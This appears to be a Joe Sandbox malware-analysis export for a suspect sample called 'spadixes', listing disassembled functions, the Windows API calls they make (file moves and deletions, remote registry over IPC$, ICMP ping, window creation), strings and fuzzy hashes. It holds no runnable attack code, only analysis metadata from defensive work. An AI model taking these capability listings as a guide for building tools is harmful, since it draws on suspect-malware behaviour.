Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
Instruction ID: f8a2cbcb32a6a6aab58aacc08bcf92f161f7caf873f4f2337f5a99b03a796e25
Opcode Fuzzy Hash: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
Instruction Fuzzy Hash: 4DE0C23A6042345BC711A658CC46FEA77ADEFCD6A0F0900B9FE09E7244EA74E9819691

Function 015D0888 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015D0893

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 9ad41d97b11001ac3803af5b00d0b6dc008d615f903f69bea92bbe43d246b5fa
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: A9E08C31905208EBEB20DAACC906AAD73A8FB04321F004A54B916CB2C0D6308A40D7D0

Function 008C3AA3 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,?,00000000,00000002), ref: 008C3AB3

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 0965b3319f474b804fb14e6aa7b544ff1a9c94f6ae6fd96ff081c9d85e774f2d
Instruction ID: 3da2b4d757c980145eb236f92453eb60a38ed74552e194f634c035d3dae2564c
Opcode Fuzzy Hash: 0965b3319f474b804fb14e6aa7b544ff1a9c94f6ae6fd96ff081c9d85e774f2d
Instruction Fuzzy Hash: 10D02B363681009BC300EF48EC09E19B7A4FBA4710F00451BF604833B2CB215C51DB92

Function 015D0858 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 015D0863

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 0e777a97f4be29b0ebbdab6da7949d542ade10528619c937959626456b453ba7
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 3BD05E3094520CEBCB20CAA89905AAD73A8EB05361F104754F915972C0D53199009794

Function 015D2268 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 015D2279

Memory Dump Source

Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 7d38440904e9781b2735d429601c5b70475763bcd6f7ef396a501d7382e4c6a8
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D1E0E67498020DDFDB00DFB8D54969D7BB4FF04301F100161FD05D2280D6309D50CA62

Non-executed Functions

Function 009060DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00905FA6,?), ref: 00906ED8

Part of subcall function 00906EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00905FA6,?), ref: 00906EF1

Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090727B
Part of subcall function 0090725E: __wsplitpath.LIBCMT ref: 0090728E

Part of subcall function 009072CB: GetFileAttributesW.KERNEL32(?,00906019), ref: 009072CC

_wcscat.LIBCMT ref: 00906149
_wcscat.LIBCMT ref: 00906167
__wsplitpath.LIBCMT ref: 0090618E
FindFirstFileW.KERNEL32(?,?), ref: 009061A4
_wcscpy.LIBCMT ref: 00906209
_wcscat.LIBCMT ref: 0090621C
_wcscat.LIBCMT ref: 0090622F
lstrcmpiW.KERNEL32(?,?), ref: 0090625D
DeleteFileW.KERNEL32(?), ref: 0090626E
MoveFileW.KERNEL32(?,?), ref: 00906289
MoveFileW.KERNEL32(?,?), ref: 00906298
CopyFileW.KERNEL32(?,?,00000000), ref: 009062AD
DeleteFileW.KERNEL32(?), ref: 009062BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 009062E1
FindClose.KERNEL32(00000000), ref: 009062FD
FindClose.KERNEL32(00000000), ref: 0090630B

Strings

\*.*, xrefs: 00906138, 00906147, 00906165

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
Instruction ID: 42d056a01f74b427371b484ee00ad21dacb76dd8e424097bcf299def20d0f31b
Opcode Fuzzy Hash: 2e9ddf0ab0da4fa2a195dcf7bd17411f60acbfbaaf93765e883d954382b48f75
Instruction Fuzzy Hash: A6515E7680811CAECB21EB95CC44DEFB7BCAF05300F0504EAE595E2141DB76A7898FA4

Function 0091A2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0091A2FE
DeleteObject.GDI32(00000000), ref: 0091A310
DestroyWindow.USER32 ref: 0091A31E
GetDesktopWindow.USER32 ref: 0091A338
GetWindowRect.USER32(00000000), ref: 0091A33F
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0091A480
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0091A490
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A4D8
GetClientRect.USER32(00000000,?), ref: 0091A4E4
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0091A51E
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A540
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A553
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A55E
GlobalLock.KERNEL32(00000000), ref: 0091A567
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A576
GlobalUnlock.KERNEL32(00000000), ref: 0091A57F
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A586
GlobalFree.KERNEL32(00000000), ref: 0091A591
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A5A3
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0094D9BC,00000000), ref: 0091A5B9
GlobalFree.KERNEL32(00000000), ref: 0091A5C9
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0091A5EF
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0091A60E
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A630
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0091A81D

Strings

static, xrefs: 0091A518, 0091A66F
AutoIt v3, xrefs: 0091A4D0
, xrefs: 0091A7A3
DISPLAY, xrefs: 0091A680

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 369e604c8ebf61e8619be5ba7655a06628c587da455329a01522f831f0a5d199
Instruction ID: 35ce79879d87d7edb4c4809213e5e342a21042b45d3b083a1faeff2b444307d3
Opcode Fuzzy Hash: 369e604c8ebf61e8619be5ba7655a06628c587da455329a01522f831f0a5d199
Instruction Fuzzy Hash: 62028F79A11208EFDB14DFA8CD89EAE7BB9FB49310F108158F9159B2A0C770ED41DB61

Function 0092D285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0092D2DB
GetSysColorBrush.USER32(0000000F), ref: 0092D30C
GetSysColor.USER32(0000000F), ref: 0092D318
SetBkColor.GDI32(?,000000FF), ref: 0092D332
SelectObject.GDI32(?,00000000), ref: 0092D341
InflateRect.USER32(?,000000FF,000000FF), ref: 0092D36C
GetSysColor.USER32(00000010), ref: 0092D374
CreateSolidBrush.GDI32(00000000), ref: 0092D37B
FrameRect.USER32(?,?,00000000), ref: 0092D38A
DeleteObject.GDI32(00000000), ref: 0092D391
InflateRect.USER32(?,000000FE,000000FE), ref: 0092D3DC
FillRect.USER32(?,?,00000000), ref: 0092D40E
GetWindowLongW.USER32(?,000000F0), ref: 0092D439

Part of subcall function 0092D575: GetSysColor.USER32(00000012), ref: 0092D5AE
Part of subcall function 0092D575: SetTextColor.GDI32(?,?), ref: 0092D5B2
Part of subcall function 0092D575: GetSysColorBrush.USER32(0000000F), ref: 0092D5C8
Part of subcall function 0092D575: GetSysColor.USER32(0000000F), ref: 0092D5D3
Part of subcall function 0092D575: GetSysColor.USER32(00000011), ref: 0092D5F0
Part of subcall function 0092D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0092D5FE
Part of subcall function 0092D575: SelectObject.GDI32(?,00000000), ref: 0092D60F
Part of subcall function 0092D575: SetBkColor.GDI32(?,00000000), ref: 0092D618
Part of subcall function 0092D575: SelectObject.GDI32(?,?), ref: 0092D625
Part of subcall function 0092D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0092D644
Part of subcall function 0092D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0092D65B
Part of subcall function 0092D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0092D670
Part of subcall function 0092D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0092D698

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
Instruction ID: 5a768c1b9735b0c4f7a0114792d6bc922872a55520ff9fbdb5e34048b300f1cf
Opcode Fuzzy Hash: 3a2e00471f9322521e884b3a0ace8c7274154b2f08feacc53054f7d3006a100e
Instruction Fuzzy Hash: 2A91B17940E311BFD7109F64DC08E6B7BA9FF8A325F100A19F962961E4C730D944DB92

Function 0090D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF

CharLowerBuffW.USER32(?,?), ref: 0090D292
GetDriveTypeW.KERNEL32 ref: 0090D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0090D38C

Strings

set cd door , xrefs: 0090D32D
open , xrefs: 0090D2EE
wait, xrefs: 0090D349
open, xrefs: 0090D2B9
close, xrefs: 0090D298
closed, xrefs: 0090D2A6, 0090D2AF
type cdaudio alias cd wait, xrefs: 0090D30A
close cd wait, xrefs: 0090D377

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 7b31281d25b86b0e338245e78b1c0bd398188ecd2f77e59fa43fce78f84a7b9f
Instruction ID: 7bdf4fcbe5467b412431b2a571ba3e4f778043b181f8d12131e3767e2ca71b82
Opcode Fuzzy Hash: 7b31281d25b86b0e338245e78b1c0bd398188ecd2f77e59fa43fce78f84a7b9f
Instruction Fuzzy Hash: B15118751142059FC704EF28C882E6AB7F8FF98758F04896DF899A7291DB31EE05CB52

Function 0090D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0090D0D8
__swprintf.LIBCMT ref: 0090D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0090D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0090D15C
_memset.LIBCMT ref: 0090D17B
_wcsncpy.LIBCMT ref: 0090D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0090D1EC
CloseHandle.KERNEL32(00000000), ref: 0090D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0090D200
CloseHandle.KERNEL32(00000000), ref: 0090D20A

Strings

\, xrefs: 0090D110
\??\%s, xrefs: 0090D0F4
:, xrefs: 0090D11B

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
Instruction ID: c68aaa010d593c3eb8292725f863e51d5ef71ecc95fb01cbf227047e502b48fd
Opcode Fuzzy Hash: cb12511301bd81949b8bff7e440985a0fa994a431847465fe860b8c9e41c7f83
Instruction Fuzzy Hash: 3531C1BA515109ABDB21DFA4CC48FEF37BCEF8A704F1040B6F519D21A1EB7096449B25

Function 008FA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008FA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008FA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008FA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008FA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 008FA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 008FA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 008FA2AB

Strings

\IPC$, xrefs: 008FA1F3
SOFTWARE\Classes\, xrefs: 008FA17D
\CLSID, xrefs: 008FA193

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
Instruction ID: f78ac7668bd2df6d6f26a949ce2a4d37b4d86e1a0a3d6197d252fca948f657b5
Opcode Fuzzy Hash: 8a6d321605a3556a46e4882fe487834d3ac28f961990d2db348a9d1a573ec936
Instruction Fuzzy Hash: 44410676C1022DABDF25EBA8DC85EEDB7B8FF14710F044029E905A3160EB719E45DB51

Function 009102EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF

CoInitialize.OLE32(00000000), ref: 0091034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009103DE
SHGetDesktopFolder.SHELL32(?), ref: 009103F2
CoCreateInstance.OLE32(0094DA8C,00000000,00000001,00973CF8,?), ref: 0091043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009104AD
CoTaskMemFree.OLE32(?,?), ref: 00910505
_memset.LIBCMT ref: 00910542
SHBrowseForFolderW.SHELL32(?), ref: 0091057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009105A1
CoTaskMemFree.OLE32(00000000), ref: 009105A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 009105DF
CoUninitialize.OLE32(00000001,00000000), ref: 009105E1

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 2193265fb5b2cc888c463b8fa4a9e3f1505dcdab64e51b18fa4ca47fe4ab3f9b
Instruction ID: 3ce46216976e94da598309814ea2575ac59f2ce47a66974e8e8eea3020605a1a
Opcode Fuzzy Hash: 2193265fb5b2cc888c463b8fa4a9e3f1505dcdab64e51b18fa4ca47fe4ab3f9b
Instruction Fuzzy Hash: 00B1EF75A00209AFDB04DFA5C888EAEBBB9FF89304B148459F905EB251D771ED81CF51

Function 008E500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008E5047

Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E

__gmtime64_s.LIBCMT ref: 008E50E0
__gmtime64_s.LIBCMT ref: 008E5116
__gmtime64_s.LIBCMT ref: 008E5133
__allrem.LIBCMT ref: 008E5189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51A5
__allrem.LIBCMT ref: 008E51BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E51DA
__allrem.LIBCMT ref: 008E51F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008E520F
__invoke_watson.LIBCMT ref: 008E5280

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 929be93cc074400216a79a274c6eda0f4636eec65b2b1f0b558b5cbbbe27db5d
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 5471E871A00F5BABD714AE7ECC41B6AB7A8FF12768F144229FA10D6681E770D9408BD1

Function 00918107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00918168
inet_addr.WSOCK32(?,?,?), ref: 009181AD
gethostbyname.WSOCK32(?), ref: 009181B9
IcmpCreateFile.IPHLPAPI ref: 009181C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00918237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0091824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 009182C2
WSACleanup.WSOCK32 ref: 009182C8

Strings

Ping, xrefs: 009181EB

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
Instruction ID: 3bf262df8a78137534397369e877f42d45128ec6ab76e7c950da1fc5cf8b00fd
Opcode Fuzzy Hash: 88636aa68cfdf3398fd3a4b8482b55e6e380927df8ec8716282f83cab726994b
Instruction Fuzzy Hash: 90518E35604604AFD721AF64CC45F6BBBE8FF49350F048929FA65DB2A1DB34E841EB42

Function 0091B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0091B2D5
CoInitialize.OLE32(00000000), ref: 0091B302
CoUninitialize.OLE32 ref: 0091B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0091B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0091B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0091B56D
CoGetObject.OLE32(?,00000000,0094D91C,?), ref: 0091B590
SetErrorMode.KERNEL32(00000000), ref: 0091B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0091B623
VariantClear.OLEAUT32(0094D91C), ref: 0091B633

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
